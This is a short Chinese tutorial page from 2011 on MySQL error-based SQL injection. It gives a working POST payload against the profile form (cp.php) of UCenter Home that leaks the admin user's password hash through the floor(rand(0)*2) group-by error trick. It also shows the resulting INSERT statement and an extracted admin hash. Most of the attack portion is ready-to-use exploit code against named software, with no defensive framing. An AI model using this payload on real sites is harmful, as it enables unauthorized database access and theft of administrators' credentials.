你的位置:聚盟网 >> 网络学院 >> 入门 >> 详细内容 在线投稿

mysql暴错注入的科普 2

www.juoooo.com  2011年9月22日23:01  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT

通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash

向cp.php?ac=profile&op=info POST提交参数:
profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]=1


SQL语句是:
INSERT INTO uchome_spaceinfo (uid,type,subtype,title,friend) VALUES ('3','info','',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#','1','0')

得到Adminhash6ad9ab1e6a74f51b57079c97329d208c,最后一位是group_key,去掉最后一位1,最后一位是group_key.

编辑: 伊小露
分享到:
顶:53 踩:71
【已经有415人表态】
62票
超赞
56票
震惊
48票
不解
42票
愤怒
56票
支持
50票
高兴
48票
无聊
53票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语